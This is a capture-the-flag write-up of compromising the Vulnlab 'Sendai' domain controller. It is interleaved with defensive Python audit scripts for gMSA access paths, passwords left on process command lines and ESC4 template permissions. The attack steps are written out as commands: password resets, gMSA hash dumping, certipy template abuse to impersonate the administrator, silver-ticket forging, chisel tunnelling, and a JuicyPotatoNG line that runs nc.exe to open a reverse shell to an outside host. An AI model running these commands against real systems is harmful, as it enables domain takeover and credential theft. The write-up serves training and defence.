2024-05-11 00:17:33 +03:00


# Vulnlab - Sendai

```
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp open  kerberos-sec
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Supported Methods: GET
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-04T16:24:01
| Not valid after:  2024-11-03T16:24:01
| MD5:   6198fc32527e478294e38fd5c6a2b81e
|_SHA-1: 73b4d1026b49e0cb9c0d633982377e74f32b7db3
|_ssl-date: 2024-05-05T16:28:56+00:00; -1m22s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  unknown
56740/tcp open  unknown
56744/tcp open  unknown
```

## PORT 80/443

Running gobuster, we find a `/service` endpoint.

However, this endpoint tells us that we don't have access to it.

## PORT 445

Enumerating SMB shares with an anonymous login shows the `config`, `sendai` and `Users` shares: `config` was not accessible, `Users` held nothing of interest, but `sendai` had some interesting files.

The incident note in the share talks about users having weak passwords and states that all users will be prompted to change their password at logon; the `transfer` directory contained per-user directories.

## Resetting domain user's password

These users can also be enumerated with lookupsid by brute forcing RIDs.

On trying to log in with a null password, we get two users whose password must be changed. The password can be changed with `impacket-smbpasswd`:

```bash
impacket-smbpasswd sendai.vl/Thomas.Powell@dc.sendai.vl -newpass '$aduwu123'
```
From the `config` share, we can grab `.sqlconfig`, which holds credentials for MSSQL.

But this service isn't exposed to us, so we move on to enumerating the domain with BloodHound:

```bash
python3 bloodhound.py -u sqlsvc -p password -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.104.41
```

Thomas.Powell is a member of the Support group, which has GenericAll on the ADMSVC group; ADMSVC in turn has ReadGMSAPassword on the MGTSVC$ account. So we need to add Thomas to the ADMSVC group and then read the NT hash of the MGTSVC$ account.
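The chain above is exactly the kind of path BloodHound draws. As an added example (not part of the writeup and not BloodHound's own code), the script below reproduces that reasoning as a graph walk: starting from a principal, it follows membership and control edges and reports every way to reach a `ReadGMSAPassword` edge. The edges are constructed to mirror the relationships described on this page; the `CLIFFORD.DAVEY -> CA-OPERATORS` edge is invented as a negative case. A defender can run the same walk over real BloodHound or LDAP data to audit who can ultimately read a gMSA's managed password, which is the control that should have stopped this step.

```python
"""Find paths from a principal to a gMSA's managed password over
BloodHound-style edges (added example; edges below are constructed)."""
from collections import deque

# Edge kinds that let the holder act as, or take control of, the target.
CONTROL_EDGES = {"MemberOf", "GenericAll", "GenericWrite", "WriteDacl",
                 "WriteOwner", "AddMember", "Owns"}
# The edge that yields the gMSA's NT hash.
READ_EDGE = "ReadGMSAPassword"

# Constructed edges: (source, edge_type, target), mirroring the writeup.
SAMPLE_EDGES = [
    ("Thomas.Powell", "MemberOf", "Support"),
    ("Support", "GenericAll", "ADMSVC"),
    ("ADMSVC", "ReadGMSAPassword", "MGTSVC$"),
    ("MGTSVC$", "MemberOf", "Remote Management Users"),
    ("Clifford.Davey", "MemberOf", "CA-Operators"),  # invented, not on a gMSA path
]


def build_graph(edges):
    """Adjacency list keyed by upper-cased principal name."""
    graph = {}
    for src, kind, dst in edges:
        graph.setdefault(src.upper(), []).append((kind, dst.upper()))
    return graph


def gmsa_paths(edges, start):
    """Return every path (list of (node, edge, node) hops) from `start`
    to a gMSA whose password the last hop can read. Breadth-first, so the
    first path found to each node is the shortest one."""
    graph = build_graph(edges)
    start = start.upper()
    results = []
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        for kind, nxt in graph.get(node, []):
            hop = (node, kind, nxt)
            if kind == READ_EDGE:
                results.append(path + [hop])
            elif kind in CONTROL_EDGES and nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [hop]))
    return results


def gmsa_readers(edges):
    """Audit view: map each gMSA to the set of principals that can reach
    its password, directly or through membership/control edges."""
    readers = {}
    nodes = {e[0].upper() for e in edges} | {e[2].upper() for e in edges}
    for node in sorted(nodes):
        for path in gmsa_paths(edges, node):
            readers.setdefault(path[-1][2], set()).add(node)
    return readers


if __name__ == "__main__":
    for path in gmsa_paths(SAMPLE_EDGES, "thomas.powell"):
        print(" -> ".join(f"{a} -[{e}]" for a, e, _ in path) + f" -> {path[-1][2]}")
    for gmsa, who in gmsa_readers(SAMPLE_EDGES).items():
        print(f"{gmsa}: readable by {sorted(who)}")
```

The `gmsa_readers` report is the one to review periodically: every group that appears there is, in effect, a holder of the service account's password, so `GenericAll` granted to a helpdesk-style group on such a group is a domain-level exposure rather than a local one.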

## Abusing GenericAll and reading GMSA password

Through bloodyAD, we use the GenericAll right to add thomas to the ADMSVC group:

```bash
python3 bloodyAD.py --host "10.10.104.41" -d 'sendai.vl' -u 'thomas.powell' -p '$aduwu123' add groupMember ADMSVC thomas.powell
```

With the gMSADumper script or with NetExec we can dump the NT hash of the MGTSVC$ account:

```bash
python3 gMSADumper.py -u 'thomas.powell' -p '$aduwu123' -d sendai.vl -l 10.10.104.41
```

This account can log in on the DC, as it is part of the Remote Management group.

Checking privileges after logging in through evil-winrm, the account doesn't hold any privilege that we can abuse to get local admin.

## Obtaining clifford's password

Among the running processes there is a helpdesk process, which doesn't normally run on a system.

Enumerating the system with PrivescCheck.ps1:

This lists the running processes, and among them we find clifford.davey's credentials.
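Credentials on a process command line are visible to every local user, which is why a process-list check finds them. As an added example (not part of the writeup and not PrivescCheck's code), the script below is the defender-side version of that check: it scans command lines for the common ways a secret is passed as an argument and reports each hit with the value redacted. The process list is constructed to resemble `wmic process get ProcessId,CommandLine` output; the helpdesk line mirrors the finding on this page with a placeholder password, and the other lines, accounts and passwords are invented.

```python
"""Flag plaintext credentials in process command lines (added example;
the process list below is constructed)."""
import re

# Ways a secret commonly appears on a command line. Group 1 is the value.
CRED_PATTERNS = [
    # -p x / --pass x / /password=x / -Password 'x'
    re.compile(r"(?i)(?<!\S)(?:-{1,2}|/)(?:p|pw|pass|passwd|password)[=:\s]+(\S+)"),
    # password=x / pwd: x / token=x anywhere in the line (e.g. inside a URL)
    re.compile(r"(?i)\b(?:password|pwd|secret|token)\s*[=:]\s*(\S+)"),
]

# Constructed sample (pid, command line). Secrets here are invented.
SAMPLE_PROCESSES = [
    (612,  r"C:\Windows\system32\svchost.exe -k netsvcs -p"),
    (2244, r"C:\helpdesk\helpdesk.exe -u sendai\clifford.davey -p PLACEHOLDER-PASSWORD -console"),
    (3100, r"C:\Program Files\Backup\agent.exe --config C:\ProgramData\agent.yml"),
    (3308, r'sqlcmd -S dc.sendai.vl -U sqlsvc -P Pass@word123 -Q "select 1"'),
    (4012, r"powershell.exe -NoProfile -File C:\scripts\sync.ps1 -Password 'Summer2024!'"),
    (5120, r"C:\tools\sync.exe --url https://example.invalid/api?token=abc123def --verbose"),
]


def redact(value):
    """Keep two characters so an admin can recognise the secret, hide the rest."""
    return value[:2] + "*" * max(len(value) - 2, 3)


def scan_command_lines(processes):
    """Return [(pid, flag_text, redacted_value)] for every process whose
    command line appears to carry a secret. One finding per pattern per
    process is enough for triage."""
    hits = []
    for pid, cmdline in processes:
        for pat in CRED_PATTERNS:
            for m in pat.finditer(cmdline):
                flag = cmdline[m.start():m.start(1)].strip()   # e.g. "-p", "token="
                value = m.group(1).strip("'\"")                 # drop surrounding quotes
                hits.append((pid, flag, redact(value)))
                break
    return hits


if __name__ == "__main__":
    for pid, flag, shown in scan_command_lines(SAMPLE_PROCESSES):
        print(f"pid {pid}: secret passed via {flag!r} -> {shown}")
```

Note that `svchost.exe -k netsvcs -p` is not reported: the `-p` there has no value, so the first pattern requires a following token before it fires. The fix for any real hit is the same as for the helpdesk service here: move the secret to a config file with a restricted ACL, a Windows credential store, or a gMSA, so the command line no longer carries it.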

## Enumerating ADCS

This user belongs to the CA-Operators group, so he is likely able to enroll in a custom template. Let's enumerate the templates with certipy.

## Escalating privileges through ESC4

```bash
certipy find -u clifford.davey -vulnerable -target dc.sendai.vl -dc-ip 10.10.115.126 -stdout
```

This lists a template, SendaiComputer, whose EKU is set to Client Authentication, so certificates issued from it can be used to authenticate to the domain. The CA-Operators group has Full Control over this template, which means we can edit the template and impersonate the domain admin; this is known as ESC4 (template access control) abuse.

With certipy, we overwrite the template's configuration so that domain users can enroll in it and impersonate any user, then request a certificate for the administrator and authenticate with it:

```bash
certipy template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.115.126 -template SendaiComputer
certipy req -u 'clifford.davey' -ca 'sendai-DC-CA' -dc-ip 10.10.115.126 -target dc.sendai.vl -template 'SendaiComputer' -upn administrator
certipy auth -pfx ./administrator.pfx -domain sendai.vl
```
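The root cause of ESC4 is the template ACL, not the EKU: any principal outside the administrative set that can write the template can turn it into whatever it needs. As an added example (not part of the writeup and not certipy's code), the script below is an audit check over template records shaped like what `certipy find` reports. The SendaiComputer record mirrors this page (CA-Operators with Full Control, Client Authentication EKU); the `User`, `WebServer` and `OldTemplate` records and the `Web Admins` and `Helpdesk` groups are invented for contrast, and the trusted-principal set is an assumption to adjust for a real forest.

```python
"""Audit certificate templates for ESC4-style control by non-admin
principals (added example; template records below are constructed)."""

# EKUs that make an issued certificate usable for domain authentication.
CLIENT_AUTH_EKUS = {"Client Authentication", "Smart Card Logon",
                    "PKINIT Client Authentication", "Any Purpose"}
# Rights that let a principal rewrite the template definition or its ACL.
TEMPLATE_CONTROL_RIGHTS = {"Full Control", "Write Owner", "Write Dacl",
                           "Write Property"}
# Principals expected to control templates (assumption; tune per forest).
TRUSTED_PRINCIPALS = {"SENDAI.VL\\Domain Admins",
                      "SENDAI.VL\\Enterprise Admins",
                      "SENDAI.VL\\Administrator"}

SAMPLE_TEMPLATES = [  # constructed records
    {"name": "SendaiComputer", "enabled": True,
     "ekus": ["Client Authentication"],
     "acl": {"SENDAI.VL\\CA-Operators": ["Full Control"],
             "SENDAI.VL\\Domain Admins": ["Full Control"]}},
    {"name": "User", "enabled": True,
     "ekus": ["Client Authentication", "Secure Email"],
     "acl": {"SENDAI.VL\\Domain Admins": ["Full Control"],
             "SENDAI.VL\\Domain Users": ["Enroll"]}},
    {"name": "WebServer", "enabled": True,
     "ekus": ["Server Authentication"],
     "acl": {"SENDAI.VL\\Web Admins": ["Write Property"]}},
    {"name": "OldTemplate", "enabled": False,
     "ekus": ["Client Authentication"],
     "acl": {"SENDAI.VL\\Helpdesk": ["Write Dacl"]}},
]


def esc4_findings(templates, trusted=TRUSTED_PRINCIPALS):
    """Return one finding per template that a non-trusted principal can
    modify. Severity is 'high' when the template is enabled and already
    carries a client-authentication EKU (the controller can rewrite it and
    use the result to authenticate as any user, as on this page); otherwise
    'medium', because the controller can still change the EKUs or other
    settings, so the right itself needs review."""
    findings = []
    for t in templates:
        controllers = {p: sorted(set(r) & TEMPLATE_CONTROL_RIGHTS)
                       for p, r in t["acl"].items()
                       if p not in trusted and set(r) & TEMPLATE_CONTROL_RIGHTS}
        if not controllers:
            continue  # only Enroll-type rights, or only trusted principals
        client_auth = bool(set(t["ekus"]) & CLIENT_AUTH_EKUS)
        severity = "high" if t["enabled"] and client_auth else "medium"
        findings.append({"template": t["name"], "severity": severity,
                         "controllers": controllers})
    return findings


if __name__ == "__main__":
    for f in esc4_findings(SAMPLE_TEMPLATES):
        print(f"[{f['severity']}] {f['template']}: {f['controllers']}")
```

Enrollment rights alone (the `Domain Users: Enroll` entry on `User`) do not produce a finding; they are what templates are for. The remediation for a `high` finding is to remove the write rights from the template ACL and re-issue or revoke certificates obtained while it was misconfigured.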

## Escalating with SeImpersonate privilege

Another way of escalating privileges is through MSSQL: since MSSQL is only listening internally, and we have access on the machine, we can port forward with chisel:

```bash
chisel server -p 2222 --reverse
chisel.exe client 10.8.0.136:2222 R:socks
```

But we get login denied for the sqlsvc account.

With ticketer, we forge a silver ticket to access the MSSQL service as Administrator (`hash` stands for the NT hash of the account running the MSSQL service):

```bash
ticketer.py -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -nthash hash Administrator
```

Enabling xp_cmdshell then lets us execute system commands as sqlsvc.

The difference from the earlier shell is that this context holds the SeImpersonate privilege, which can be abused to get local admin.

Using JuicyPotatoNG to abuse the privilege and get a shell as SYSTEM:

```bash
.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Users\sqlsvc\nc.exe 10.8.0.136 4444 -e cmd.exe"
```

## References